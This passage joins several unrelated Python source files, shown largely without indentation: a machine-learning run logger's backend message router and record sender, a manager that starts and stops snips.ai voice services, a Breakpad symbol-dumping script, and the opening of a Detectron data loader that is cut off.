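# "live") to the protobuf enum values and back. The hypothetical helper below
# only demonstrates that round trip; its name is an assumption and it is never
# called anywhere in this module.
def _example_file_policy_round_trip() -> None:
    for policy in ("now", "end", "live"):
        enum_value = file_policy_to_enum(policy)
        # Converting the enum back should recover the original policy string.
        assert file_enum_to_policy(enum_value) == policy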
class _Future(object):
_object: Optional[pb.Result]
def __init__(self) -> None:
self._object = None
self._object_ready = threading.Event()
self._lock = threading.Lock()
def get(self, timeout: int = None) -> Optional[pb.Result]:
is_set = self._object_ready.wait(timeout)
if is_set and self._object:
return self._object
return None
def _set_object(self, obj: pb.Result) -> None:
self._object = obj
self._object_ready.set()
class MessageRouter(object):
_pending_reqs: Dict[str, _Future]
_request_queue: "Queue[pb.Record]"
_response_queue: "Queue[pb.Result]"
def __init__(
self, request_queue: "Queue[pb.Record]", response_queue: "Queue[pb.Result]"
) -> None:
self._request_queue = request_queue
self._response_queue = response_queue
self._pending_reqs = {}
self._lock = threading.Lock()
self._join_event = threading.Event()
self._thread = threading.Thread(target=self.message_loop)
self._thread.daemon = True
self._thread.start()
def message_loop(self) -> None:
while not self._join_event.is_set():
try:
msg = self._response_queue.get(timeout=1)
except queue.Empty:
continue
self._handle_msg_rcv(msg)
def send_and_receive(self, rec: pb.Record, local: Optional[bool] = None) -> _Future:
rec.control.req_resp = True
if local:
rec.control.local = local
rec.uuid = uuid.uuid4().hex
future = _Future()
with self._lock:
self._pending_reqs[rec.uuid] = future
self._request_queue.put(rec)
return future
def join(self) -> None:
self._join_event.set()
self._thread.join()
def _handle_msg_rcv(self, msg: pb.Result) -> None:
with self._lock:
future = self._pending_reqs.pop(msg.uuid, None)
if future is None:
# TODO (cvp): saw this in tests, seemed benign enough to ignore, but
# could point to other issues.
if msg.uuid != "":
logger.warning(
"No listener found for msg with uuid %s (%s)", msg.uuid, msg
)
return
future._set_object(msg)
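# Illustrative sketch (an assumption, not part of the original module): it shows
# how MessageRouter pairs each request with its response purely through the
# record uuid. The "internal process" is faked by echoing a pb.Result with the
# same uuid back onto the response queue; _example_message_router_round_trip is
# a hypothetical name used only for this demonstration.
def _example_message_router_round_trip() -> None:
    request_q = queue.Queue()
    response_q = queue.Queue()
    router = MessageRouter(request_q, response_q)
    future = router.send_and_receive(pb.Record())
    # Pretend to be the internal process: read the request and answer it.
    rec = request_q.get(timeout=1)
    response_q.put(pb.Result(uuid=rec.uuid))
    result = future.get(timeout=5)
    assert result is not None and result.uuid == rec.uuid
    router.join()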
class BackendSender(object):
record_q: Optional["Queue[pb.Record]"]
result_q: Optional["Queue[pb.Result]"]
process: Optional[Process]
_run: Optional["Run"]
_router: Optional[MessageRouter]
def __init__(
self,
record_q: "Queue[pb.Record]" = None,
result_q: "Queue[pb.Result]" = None,
process: Process = None,
) -> None:
self.record_q = record_q
self.result_q = result_q
self._process = process
self._run = None
self._router = None
if record_q and result_q:
self._router = MessageRouter(record_q, result_q)
def _hack_set_run(self, run: "Run") -> None:
self._run = run
def publish_output(self, name: str, data: str) -> None:
# from vendor.protobuf import google3.protobuf.timestamp
# ts = timestamp.Timestamp()
# ts.GetCurrentTime()
# now = datetime.now()
if name == "stdout":
otype = pb.OutputRecord.OutputType.STDOUT
elif name == "stderr":
otype = pb.OutputRecord.OutputType.STDERR
else:
# TODO(jhr): throw error?
print("unknown type")
o = pb.OutputRecord(output_type=otype, line=data)
o.timestamp.GetCurrentTime()
self._publish_output(o)
def _publish_output(self, outdata: pb.OutputRecord) -> None:
rec = pb.Record()
rec.output.CopyFrom(outdata)
self._publish(rec)
def publish_tbdata(
self, log_dir: str, save: bool, root_logdir: Optional[str]
) -> None:
tbrecord = pb.TBRecord()
tbrecord.log_dir = log_dir
tbrecord.save = save
tbrecord.root_dir = root_logdir or ""
rec = self._make_record(tbrecord=tbrecord)
self._publish(rec)
def _publish_history(self, history: pb.HistoryRecord) -> None:
rec = self._make_record(history=history)
self._publish(rec)
def publish_preempting(self) -> None:
preempt_rec = pb.RunPreemptingRecord()
rec = self._make_record(preempting=preempt_rec)
self._publish(rec)
def publish_history(
self, data: dict, step: int = None, run: "Run" = None, publish_step: bool = True
) -> None:
run = run or self._run
data = data_types.history_dict_to_json(run, data, step=step)
history = pb.HistoryRecord()
if publish_step:
assert step is not None
history.step.num = step
data.pop("_step", None)
for k, v in six.iteritems(data):
item = history.item.add()
item.key = k
item.value_json = json_dumps_safer_history(v) # type: ignore
self._publish_history(history)
def publish_telemetry(self, telem: tpb.TelemetryRecord) -> None:
rec = self._make_record(telemetry=telem)
self._publish(rec)
def _make_run(self, run: "Run") -> pb.RunRecord:
proto_run = pb.RunRecord()
run._make_proto_run(proto_run)
if run._settings.host:
proto_run.host = run._settings.host
if run._config is not None:
config_dict = run._config._as_dict() # type: ignore
self._make_config(data=config_dict, obj=proto_run.config)
if run._telemetry_obj:
proto_run.telemetry.MergeFrom(run._telemetry_obj)
return proto_run
def _make_artifact(self, artifact: Artifact) -> pb.ArtifactRecord:
proto_artifact = pb.ArtifactRecord()
proto_artifact.type = artifact.type
proto_artifact.name = artifact.name
proto_artifact.client_id = artifact._client_id
proto_artifact.sequence_client_id = artifact._sequence_client_id
proto_artifact.digest = artifact.digest
if artifact.distributed_id:
proto_artifact.distributed_id = artifact.distributed_id
if artifact.description:
proto_artifact.description = artifact.description
if artifact.metadata:
proto_artifact.metadata = json.dumps(json_friendly_val(artifact.metadata)) # type: ignore
proto_artifact.incremental_beta1 = artifact.incremental
self._make_artifact_manifest(artifact.manifest, obj=proto_artifact.manifest)
return proto_artifact
def _make_artifact_manifest(
self, artifact_manifest: ArtifactManifest, obj: pb.ArtifactManifest = None
) -> pb.ArtifactManifest:
proto_manifest = obj or pb.ArtifactManifest()
proto_manifest.version = artifact_manifest.version() # type: ignore
proto_manifest.storage_policy = artifact_manifest.storage_policy.name()
for k, v in artifact_manifest.storage_policy.config().items() or {}.items():
cfg = proto_manifest.storage_policy_config.add()
cfg.key = k
cfg.value_json = json.dumps(v)
for entry in sorted(artifact_manifest.entries.values(), key=lambda k: k.path): # type: ignore
proto_entry = proto_manifest.contents.add()
proto_entry.path = entry.path
proto_entry.digest = entry.digest
if entry.size:
proto_entry.size = entry.size
if entry.birth_artifact_id:
proto_entry.birth_artifact_id = entry.birth_artifact_id
if entry.ref:
proto_entry.ref = entry.ref
if entry.local_path:
proto_entry.local_path = entry.local_path
for k, v in entry.extra.items():
proto_extra = proto_entry.extra.add()
proto_extra.key = k
proto_extra.value_json = json.dumps(v)
return proto_manifest
def _make_exit(self, exit_code: int) -> pb.RunExitRecord:
exit = pb.RunExitRecord()
exit.exit_code = exit_code
return exit
def _make_config(
self,
data: dict = None,
key: Union[Tuple[str, ...], str] = None,
val: Any = None,
obj: pb.ConfigRecord = None,
) -> pb.ConfigRecord:
config = obj or pb.ConfigRecord()
if data:
for k, v in six.iteritems(data):
update = config.update.add()
update.key = k
update.value_json = json_dumps_safer(json_friendly(v)[0]) # type: ignore
if key:
update = config.update.add()
if isinstance(key, tuple):
for k in key:
update.nested_key.append(k)
else:
update.key = key
update.value_json = json_dumps_safer(json_friendly(val)[0]) # type: ignore
return config
def _make_stats(self, stats_dict: dict) -> pb.StatsRecord:
stats = pb.StatsRecord()
stats.stats_type = pb.StatsRecord.StatsType.SYSTEM
stats.timestamp.GetCurrentTime()
for k, v in six.iteritems(stats_dict):
item = stats.item.add()
item.key = k
item.value_json = json_dumps_safer(json_friendly(v)[0]) # type: ignore
return stats
def _summary_encode(self, value: t.Any, path_from_root: str) -> dict:
"""Normalize, compress, and encode sub-objects for backend storage.
value: Object to encode.
path_from_root: `str` dot separated string from the top-level summary to the
current `value`.
Returns:
A new tree of dict's with large objects replaced with dictionaries
with "_type" entries that say which type the original data was.
"""
# Constructs a new `dict` tree in `json_value` that discards and/or
# encodes objects that aren't JSON serializable.
if isinstance(value, dict):
json_value = {}
for key, value in six.iteritems(value):
json_value[key] = self._summary_encode(
value, path_from_root + "." + key
)
return json_value
else:
friendly_value, converted = json_friendly( # type: ignore
data_types.val_to_json(
self._run, path_from_root, value, namespace="summary"
)
)
json_value, compressed = maybe_compress_summary( # type: ignore
friendly_value, get_h5_typename(value) # type: ignore
)
if compressed:
# TODO(jhr): implement me
pass
# self.write_h5(path_from_root, friendly_value)
return json_value
def _make_summary_from_dict(self, summary_dict: dict) -> pb.SummaryRecord:
summary = pb.SummaryRecord()
for k, v in six.iteritems(summary_dict):
update = summary.update.add()
update.key = k
update.value_json = json.dumps(v)
return summary
def _make_summary(self, summary_record: sr.SummaryRecord) -> pb.SummaryRecord:
pb_summary_record = pb.SummaryRecord()
for item in summary_record.update:
pb_summary_item = pb_summary_record.update.add()
key_length = len(item.key)
assert key_length > 0
if key_length > 1:
pb_summary_item.nested_key.extend(item.key)
else:
pb_summary_item.key = item.key[0]
path_from_root = ".".join(item.key)
json_value = self._summary_encode(item.value, path_from_root)
json_value, _ = json_friendly(json_value) # type: ignore
pb_summary_item.value_json = json.dumps(
json_value, cls=WandBJSONEncoderOld,
)
for item in summary_record.remove:
pb_summary_item = pb_summary_record.remove.add()
key_length = len(item.key)
assert key_length > 0
if key_length > 1:
pb_summary_item.nested_key.extend(item.key)
else:
pb_summary_item.key = item.key[0]
return pb_summary_record
def _make_files(self, files_dict: dict) -> pb.FilesRecord:
files = pb.FilesRecord()
for path, policy in files_dict["files"]:
f = files.files.add()
f.path = path
f.policy = file_policy_to_enum(policy)
return files
def _make_login(self, api_key: str = None) -> pb.LoginRequest:
login = pb.LoginRequest()
if api_key:
login.api_key = api_key
return login
def _make_request(
self,
login: pb.LoginRequest = None,
get_summary: pb.GetSummaryRequest = None,
pause: pb.PauseRequest = None,
resume: pb.ResumeRequest = None,
stop_status: pb.StopStatusRequest = None,
network_status: pb.NetworkStatusRequest = None,
poll_exit: pb.PollExitRequest = None,
sampled_history: pb.SampledHistoryRequest = None,
run_start: pb.RunStartRequest = None,
check_version: pb.CheckVersionRequest = None,
log_artifact: pb.LogArtifactRequest = None,
defer: pb.DeferRequest = None,
) -> pb.Record:
request = pb.Request()
if login:
request.login.CopyFrom(login)
elif get_summary:
request.get_summary.CopyFrom(get_summary)
elif pause:
request.pause.CopyFrom(pause)
elif resume:
request.resume.CopyFrom(resume)
elif stop_status:
request.stop_status.CopyFrom(stop_status)
elif network_status:
request.network_status.CopyFrom(network_status)
elif poll_exit:
request.poll_exit.CopyFrom(poll_exit)
elif sampled_history:
request.sampled_history.CopyFrom(sampled_history)
elif run_start:
request.run_start.CopyFrom(run_start)
elif check_version:
request.check_version.CopyFrom(check_version)
elif log_artifact:
request.log_artifact.CopyFrom(log_artifact)
elif defer:
request.defer.CopyFrom(defer)
else:
raise Exception("Invalid request")
record = self._make_record(request=request)
# Requests are never persisted
record.control.local = True
return record
def _make_record(
self,
run: pb.RunRecord = None,
config: pb.ConfigRecord = None,
files: pb.FilesRecord = None,
summary: pb.SummaryRecord = None,
history: pb.HistoryRecord = None,
stats: pb.StatsRecord = None,
exit: pb.RunExitRecord = None,
artifact: pb.ArtifactRecord = None,
tbrecord: pb.TBRecord = None,
alert: pb.AlertRecord = None,
final: pb.FinalRecord = None,
metric: pb.MetricRecord = None,
header: pb.HeaderRecord = None,
footer: pb.FooterRecord = None,
request: pb.Request = None,
telemetry: tpb.TelemetryRecord = None,
preempting: pb.RunPreemptingRecord = None,
) -> pb.Record:
record = pb.Record()
if run:
record.run.CopyFrom(run)
elif config:
record.config.CopyFrom(config)
elif summary:
record.summary.CopyFrom(summary)
elif history:
record.history.CopyFrom(history)
elif files:
record.files.CopyFrom(files)
elif stats:
record.stats.CopyFrom(stats)
elif exit:
record.exit.CopyFrom(exit)
elif artifact:
record.artifact.CopyFrom(artifact)
elif tbrecord:
record.tbrecord.CopyFrom(tbrecord)
elif alert:
record.alert.CopyFrom(alert)
elif final:
record.final.CopyFrom(final)
elif header:
record.header.CopyFrom(header)
elif footer:
record.footer.CopyFrom(footer)
elif request:
record.request.CopyFrom(request)
elif telemetry:
record.telemetry.CopyFrom(telemetry)
elif metric:
record.metric.CopyFrom(metric)
elif preempting:
record.preempting.CopyFrom(preempting)
else:
raise Exception("Invalid record")
return record
def _publish(self, record: pb.Record, local: bool = None) -> None:
if self._process and not self._process.is_alive():
raise Exception("The wandb backend process has shutdown")
if local:
record.control.local = local
if self.record_q:
self.record_q.put(record)
def _communicate(
self, rec: pb.Record, timeout: Optional[int] = 5, local: bool = None
) -> Optional[pb.Result]:
return self._communicate_async(rec, local=local).get(timeout=timeout)
def _communicate_async(self, rec: pb.Record, local: bool = None) -> _Future:
assert self._router
if self._process and not self._process.is_alive():
raise Exception("The wandb backend process has shutdown")
future = self._router.send_and_receive(rec, local=local)
return future
def communicate_login(
self, api_key: str = None, timeout: Optional[int] = 15
) -> pb.LoginResponse:
login = self._make_login(api_key)
rec = self._make_request(login=login)
result = self._communicate(rec, timeout=timeout)
if result is None:
# TODO: friendlier error message here
raise wandb.Error(
"Couldn't communicate with backend after %s seconds" % timeout
)
login_response = result.response.login_response
assert login_response
return login_response
def _publish_defer(self, state: "pb.DeferRequest.DeferStateValue") -> None:
defer = pb.DeferRequest(state=state)
rec = self._make_request(defer=defer)
self._publish(rec, local=True)
def publish_defer(self, state: int = 0) -> None:
self._publish_defer(cast("pb.DeferRequest.DeferStateValue", state))
def publish_header(self) -> None:
header = pb.HeaderRecord()
rec = self._make_record(header=header)
self._publish(rec)
def publish_footer(self) -> None:
footer = pb.FooterRecord()
rec = self._make_record(footer=footer)
self._publish(rec)
def publish_final(self) -> None:
final = pb.FinalRecord()
rec = self._make_record(final=final)
self._publish(rec)
def publish_login(self, api_key: str = None) -> None:
login = self._make_login(api_key)
rec = self._make_request(login=login)
self._publish(rec)
def publish_pause(self) -> None:
pause = pb.PauseRequest()
rec = self._make_request(pause=pause)
self._publish(rec)
def publish_resume(self) -> None:
resume = pb.ResumeRequest()
rec = self._make_request(resume=resume)
self._publish(rec)
def _publish_run(self, run: pb.RunRecord) -> None:
rec = self._make_record(run=run)
self._publish(rec)
def publish_run(self, run_obj: "Run") -> None:
run = self._make_run(run_obj)
self._publish_run(run)
def publish_config(
self,
data: dict = None,
key: Union[Tuple[str, ...], str] = None,
val: Any = None,
) -> None:
cfg = self._make_config(data=data, key=key, val=val)
self._publish_config(cfg)
def _publish_config(self, cfg: pb.ConfigRecord) -> None:
rec = self._make_record(config=cfg)
self._publish(rec)
def publish_summary(self, summary_record: sr.SummaryRecord) -> None:
pb_summary_record = self._make_summary(summary_record)
self._publish_summary(pb_summary_record)
def _publish_summary(self, summary: pb.SummaryRecord) -> None:
rec = self._make_record(summary=summary)
self._publish(rec)
def _publish_metric(self, metric: pb.MetricRecord) -> None:
rec = self._make_record(metric=metric)
self._publish(rec)
def _communicate_run(
self, run: pb.RunRecord, timeout: int = None
) -> Optional[pb.RunUpdateResult]:
"""Send synchronous run object waiting for a response.
Arguments:
run: RunRecord object
timeout: number of seconds to wait
Returns:
RunRecord object
"""
req = self._make_record(run=run)
resp = self._communicate(req, timeout=timeout)
if resp is None:
logger.info("couldn't get run from backend")
# Note: timeouts handled by callers: wandb_init.py
return None
assert resp.HasField("run_result")
return resp.run_result
def communicate_run(
self, run_obj: "Run", timeout: int = None
) -> Optional[pb.RunUpdateResult]:
run = self._make_run(run_obj)
return self._communicate_run(run, timeout=timeout)
def publish_stats(self, stats_dict: dict) -> None:
stats = self._make_stats(stats_dict)
rec = self._make_record(stats=stats)
self._publish(rec)
def publish_files(self, files_dict: dict) -> None:
files = self._make_files(files_dict)
rec = self._make_record(files=files)
self._publish(rec)
def communicate_artifact(
self,
run: "Run",
artifact: Artifact,
aliases: Iterable[str],
is_user_created: bool = False,
use_after_commit: bool = False,
finalize: bool = True,
) -> _Future:
proto_run = self._make_run(run)
proto_artifact = self._make_artifact(artifact)
proto_artifact.run_id = proto_run.run_id
proto_artifact.project = proto_run.project
proto_artifact.entity = proto_run.entity
proto_artifact.user_created = is_user_created
proto_artifact.use_after_commit = use_after_commit
proto_artifact.finalize = finalize
for alias in aliases:
proto_artifact.aliases.append(alias)
log_artifact = pb.LogArtifactRequest()
log_artifact.artifact.CopyFrom(proto_artifact)
rec = self._make_request(log_artifact=log_artifact)
return self._communicate_async(rec)
def publish_artifact(
self,
run: "Run",
artifact: Artifact,
aliases: Iterable[str],
is_user_created: bool = False,
use_after_commit: bool = False,
finalize: bool = True,
) -> None:
proto_run = self._make_run(run)
proto_artifact = self._make_artifact(artifact)
proto_artifact.run_id = proto_run.run_id
proto_artifact.project = proto_run.project
proto_artifact.entity = proto_run.entity
proto_artifact.user_created = is_user_created
proto_artifact.use_after_commit = use_after_commit
proto_artifact.finalize = finalize
for alias in aliases:
proto_artifact.aliases.append(alias)
rec = self._make_record(artifact=proto_artifact)
self._publish(rec)
def publish_alert(
self, title: str, text: str, level: str, wait_duration: int
) -> None:
proto_alert = pb.AlertRecord()
proto_alert.title = title
proto_alert.text = text
proto_alert.level = level
proto_alert.wait_duration = wait_duration
rec = self._make_record(alert=proto_alert)
self._publish(rec)
def communicate_stop_status(
self, timeout: int = None
) -> Optional[pb.StopStatusResponse]:
status = pb.StopStatusRequest()
req = self._make_request(stop_status=status)
resp = self._communicate(req, timeout=timeout, local=True)
if resp is None:
return None
assert resp.response.stop_status_response
return resp.response.stop_status_response
def communicate_network_status(
self, timeout: int = None
) -> Optional[pb.NetworkStatusResponse]:
status = pb.NetworkStatusRequest()
req = self._make_request(network_status=status)
resp = self._communicate(req, timeout=timeout, local=True)
if resp is None:
return None
assert resp.response.network_status_response
return resp.response.network_status_response
def publish_exit(self, exit_code: int) -> None:
exit_data = self._make_exit(exit_code)
rec = self._make_record(exit=exit_data)
self._publish(rec)
def _communicate_exit(
self, exit_data: pb.RunExitRecord, timeout: int = None
) -> pb.RunExitResult:
req = self._make_record(exit=exit_data)
result = self._communicate(req, timeout=timeout)
if result is None:
# TODO: friendlier error message here
raise wandb.Error(
"Couldn't communicate with backend after %s seconds" % timeout
)
assert result.exit_result
return result.exit_result
def communicate_poll_exit(self) -> Optional[pb.PollExitResponse]:
poll_request = pb.PollExitRequest()
rec = self._make_request(poll_exit=poll_request)
result = self._communicate(rec)
if result is None:
return None
poll_exit_response = result.response.poll_exit_response
assert poll_exit_response
return poll_exit_response
def communicate_check_version(
self, current_version: str = None
) -> Optional[pb.CheckVersionResponse]:
check_version = pb.CheckVersionRequest()
if current_version:
check_version.current_version = current_version
rec = self._make_request(check_version=check_version)
result = self._communicate(rec)
if result is None:
# Note: timeouts handled by callers: wandb_init.py
return None
return result.response.check_version_response
def communicate_run_start(self, run_pb: pb.RunRecord) -> Optional[pb.Result]:
run_start = pb.RunStartRequest()
run_start.run.CopyFrom(run_pb)
rec = self._make_request(run_start=run_start)
result = self._communicate(rec)
return result
def communicate_exit(self, exit_code: int, timeout: int = None) -> pb.RunExitResult:
exit_data = self._make_exit(exit_code)
return self._communicate_exit(exit_data, timeout=timeout)
def communicate_summary(self) -> Optional[pb.GetSummaryResponse]:
record = self._make_request(get_summary=pb.GetSummaryRequest())
result = self._communicate(record, timeout=10)
if result is None:
return None
get_summary_response = result.response.get_summary_response
assert get_summary_response
return get_summary_response
def communicate_sampled_history(self) -> Optional[pb.SampledHistoryResponse]:
record = self._make_request(sampled_history=pb.SampledHistoryRequest())
result = self._communicate(record)
if result is None:
return None
sampled_history_response = result.response.sampled_history_response
assert sampled_history_response
return sampled_history_response
def join(self) -> None:
# shutdown
request = pb.Request(shutdown=pb.ShutdownRequest())
record = self._make_record(request=request)
_ = self._communicate(record)
if self._router:
self._router.join()
|
snips_services.py
|
#!/usr/bin/python2.7
# -*- coding: utf-8 -*-
############################################################
# -Management class for the non-Python snips.ai services
# -Snips.ai consists of several services connected over MQTT
# -For minimal use, 6 services must be running:
# snips-audio-server #handles audio input/output
# snips-asr #speech-recognition (voice processing) engine
# snips-hotword #detects the "hey snips" wake word #Optional
# snips-nlu #appears to convert the ASR output into text
# snips-dialogue #appears to manage every NLU output
# snips-injection #used to inject unknown words into the model
# -There is also a TTS service
# snips-tts
#
# -The class below manages the execution of the snips.ai services
# and makes sure they are shut down properly when the program dies
############################################################
# Global import
import subprocess
import sys
from threading import Thread
from time import sleep
import signal
import atexit
import os
try:
from queue import Queue, Empty
except ImportError:
from Queue import Queue, Empty # python 2.x
def _print(text, printOn):
# Printing that can be switched off
if printOn:
print(text)
class _Snips_Service():
""" Activer un seul service snips.ai """
def __init__(self, command, name, printOn):
self.name = name
self.pOn = printOn
_print("[I[" + str(command) + "] init", self.pOn)
self.sp = subprocess.Popen(
command,
bufsize=64,
shell=True,
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.run_stderr_alive = True
t_err = Thread(target=self.run_stderr, args=(self.sp.stderr, None))
t_err.daemon = True
t_err.start()
self.run_stdout_alive = True
t_out = Thread(target=self.run_stdout, args=(self.sp.stdout, None))
t_out.daemon = True
t_out.start()
def terminate(self):
""" Ne fonctionne pas, pas au point """
self.run_stderr_alive = False
self.run_stdout_alive = False
try:
pass
# os.killpg(os.getpgid(self.sp.pid), signal.SIGTERM) #Too drastic
# self.sp.kill() #Does not work
# try:
# self.sp.wait()
# if(self.sp.poll() is not None):
# for n in range(0, 10):
# self.sp.kill()
# self.sp.wait()
# _print("[E[" + self.name + "] " + "Process not Dead !!!", self.pOn)
# sleep(0.5)
# else:
# _print("[I[" + self.name + "] " + "Process terminated", self.pOn)
# except Exception:
# _print("[E[" + self.name + "] " + "Failing wait or someting when killing", self.pOn)
except Exception:
_print("[E[" + self.name + "] " + "Failing killing process, probably not active", self.pOn)
def run_stderr(self, out, _):
while(self.run_stderr_alive):
line = out.readline()[:-1]
if len(line) > 0:
_print("[E[" + self.name + "] " + line, self.pOn)
def run_stdout(self, out, _):
while(self.run_stdout_alive):
line = out.readline()[:-1]
if len(line) > 0:
_print("[I[" + self.name + "] " + line, self.pOn)
class Snips_Services_Start(Thread):
""" Demarer tout les services snips et gérer leur fermeture """
def __init__(self, printOn=False):
Thread.__init__(self)
self.pOn = printOn
self.daemon = True
self.alive = True
self.services = []
self.start()
atexit.register(self.sysexit_callback)
# signal.signal(signal.SIGINT, self.exit_gracefully) #Works
# signal.signal(signal.SIGTERM, self.exit_gracefully) #Works
if printOn is False:
print("[i[Snips_Services_Start] No output")
def exit_gracefully(self, signum, frame):
_print("[E[Snips_Services_Start] KILL DETECTED KILLING ALL PROCESS", self.pOn)
self.stop()
def sysexit_callback(self):
_print("[E[Snips_Services_Start] sys.exit() detected KILLING ALL PROCESS", self.pOn)
self.stop()
def stop(self):
self.alive = False
os.killpg(os.getpgid(os.getpid()), signal.SIGTERM) # Sufficient and the most effective way to make sure the process dies
self._stop_services()
def run(self):
self._start_services()
while(self.alive):
sleep(1)
def _start_services(self):
self.services.append(_Snips_Service("snips-audio-server" , "audio", printOn=self.pOn))
self.services.append(_Snips_Service("snips-asr" , "asr ", printOn=self.pOn))
self.services.append(_Snips_Service("snips-tts" , "tts ", printOn=self.pOn))
# self.services.append(_Snips_Service("snips-hotword" , "hotwd", printOn=self.pOn))
self.services.append(_Snips_Service("snips-dialogue" , "dialo", printOn=self.pOn))
self.services.append(_Snips_Service("snips-nlu" , "nlu ", printOn=self.pOn))
self.services.append(_Snips_Service("snips-injection" , "injec", printOn=self.pOn))
def _stop_services(self):
for service in self.services:
service.terminate()
def _close_os_snips_process(self):
# NOT YET USED, UNSTABLE
try:
retcode = subprocess.Popen(
["pgrep snips-"],
close_fds=True,
bufsize=64,
shell=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
pids = retcode.stdout.read().splitlines()
_print(pids, self.pOn)
for pid in pids:
_print("[I[Snips_Services_Start] Killing process: " + str(pid), self.pOn)
retcode = subprocess.call(["pkill", pid])
except Exception as e:
_print("[E[Snips_Services_Start]" + str(e), self.pOn)
if __name__ == "__main__":
s = Snips_Services_Start(False)
sleep(2)
s.stop() # Mandatory, otherwise the snips processes do not die; this stop is drastic
sys.exit(1) # Does not kill the processes correctly on its own
|
generate_breakpad_symbols.py
|
#!/usr/bin/env python
# Copyright (c) 2013 GitHub, Inc.
# Copyright (c) 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Convert pdb to sym for given directories"""
import errno
import glob
import optparse
import os
import Queue
import re
import shutil
import subprocess
import sys
import threading
CONCURRENT_TASKS=4
SOURCE_ROOT=os.path.abspath(os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(__file__)))))
DUMP_SYMS=os.path.join(SOURCE_ROOT, 'breakpad', 'src', 'tools', 'windows', 'binaries', 'dump_syms.exe')
def GetCommandOutput(command):
"""Runs the command list, returning its output.
Prints the given command (which should be a list of one or more strings),
then runs it and returns its output (stdout) as a string.
From chromium_utils.
"""
devnull = open(os.devnull, 'w')
proc = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=devnull,
bufsize=1)
output = proc.communicate()[0]
return output
def mkdir_p(path):
"""Simulates mkdir -p."""
try:
os.makedirs(path)
except OSError as e:
if e.errno == errno.EEXIST and os.path.isdir(path):
pass
else: raise
def GenerateSymbols(options, binaries):
"""Dumps the symbols of binary and places them in the given directory."""
queue = Queue.Queue()
print_lock = threading.Lock()
def _Worker():
while True:
binary = queue.get()
if options.verbose:
with print_lock:
print "Generating symbols for %s" % binary
syms = GetCommandOutput([DUMP_SYMS, binary])
module_line = re.match("MODULE [^ ]+ [^ ]+ ([0-9A-Fa-f]+) (.*)\r\n", syms)
if module_line == None:
with print_lock:
print "Failed to get symbols for %s" % binary
queue.task_done()
continue
output_path = os.path.join(options.symbols_dir, module_line.group(2),
module_line.group(1))
mkdir_p(output_path)
symbol_file = "%s.sym" % module_line.group(2)[:-4] # strip .pdb
f = open(os.path.join(output_path, symbol_file), 'w')
f.write(syms)
f.close()
queue.task_done()
for binary in binaries:
queue.put(binary)
for _ in range(options.jobs):
t = threading.Thread(target=_Worker)
t.daemon = True
t.start()
queue.join()
def main():
parser = optparse.OptionParser()
parser.add_option('', '--symbols-dir', default='',
help='The directory where to write the symbols file.')
parser.add_option('', '--clear', default=False, action='store_true',
help='Clear the symbols directory before writing new '
'symbols.')
parser.add_option('-j', '--jobs', default=CONCURRENT_TASKS, action='store',
type='int', help='Number of parallel tasks to run.')
parser.add_option('-v', '--verbose', action='store_true',
help='Print verbose status output.')
(options, directories) = parser.parse_args()
if not options.symbols_dir:
print "Required option --symbols-dir missing."
return 1
if options.clear:
try:
shutil.rmtree(options.symbols_dir)
except:
pass
pdbs = []
for directory in directories:
pdbs += glob.glob(os.path.join(directory, '*.exe.pdb'))
pdbs += glob.glob(os.path.join(directory, '*.dll.pdb'))
GenerateSymbols(options, pdbs)
return 0
if '__main__' == __name__:
sys.exit(main())
|
loader.py
|
# Copyright (c) 2017-present, Facebook, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##############################################################################
"""Detectron data loader. The design is generic and abstracted away from any
details of the minibatch. A minibatch is a dictionary of blob name keys and
their associated numpy (float32 or int32) ndarray values.
Outline of the data loader design:
loader thread\
loader thread \ / GPU 1 enqueue thread -> feed -> EnqueueOp
... -> minibatch queue -> ...
loader thread / \ GPU N enqueue thread -> feed -> EnqueueOp
loader thread/
<---------------------------- CPU -----------------------------|---- GPU ---->
A pool of loader threads construct minibatches that are put onto the shared
minibatch queue. Each GPU has an enqueue thread that pulls a minibatch off the
minibatch queue, feeds the minibatch blobs into the workspace, and then runs
an EnqueueBlobsOp to place the minibatch blobs into the GPU's blobs queue.
During each fprop the first thing the network does is run a DequeueBlobsOp
in order to populate the workspace with the blobs from a queued minibatch.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from collections import deque
from collections import OrderedDict
import logging
import numpy as np
import signal
import threading
import time
import uuid
import cv2
import os
from six.moves import queue as Queue
from caffe2.python import core, workspace
from detectron.core.config import cfg
from detectron.roi_data.minibatch import get_minibatch
from detectron.roi_data.minibatch import get_minibatch_blob_names
from detectron.utils.coordinator import coordinated_get
from detectron.utils.coordinator import coordinated_put
from detectron.utils.coordinator import Coordinator
import detectron.utils.c2 as c2_utils
logger = logging.getLogger(__name__)
class RoIDataLoader(object):
def __init__(
self,
roidb,
num_loaders=4,
minibatch_queue_size=64,
blobs_queue_capacity=8
):
self._roidb = roidb
self._lock = threading.Lock()
self._perm = deque(range(len(self._roidb)))
self._cur = 0 # _perm cursor
# The minibatch queue holds prepared training data in host (CPU) memory
# When training with N > 1 GPUs, each element in the minibatch queue
# is actually a partial minibatch which contributes 1 / N of the
# examples to the overall minibatch
self._minibatch_queue = Queue.Queue(maxsize=minibatch_queue_size)
self._blobs_queue_capacity = blobs_queue_capacity
# Random queue name in case one instantiates multple RoIDataLoaders
self._loader_id = uuid.uuid4()
self._blobs_queue_name = 'roi_blobs_queue_{}'.format(self._loader_id)
# Loader threads construct (partial) minibatches and put them on the
# minibatch queue
self._num_loaders = num_loaders
self._num_gpus = cfg.NUM_GPUS
self.coordinator = Coordinator()
self._output_names = get_minibatch_blob_names()
self._shuffle_roidb_inds()
self.create_threads()
def minibatch_loader_thread(self):
"""Load mini-batches and put them onto the mini-batch queue."""
with self.coordinator.stop_on_exception():
while not self.coordinator.should_stop():
blobs = self.get_next_minibatch()
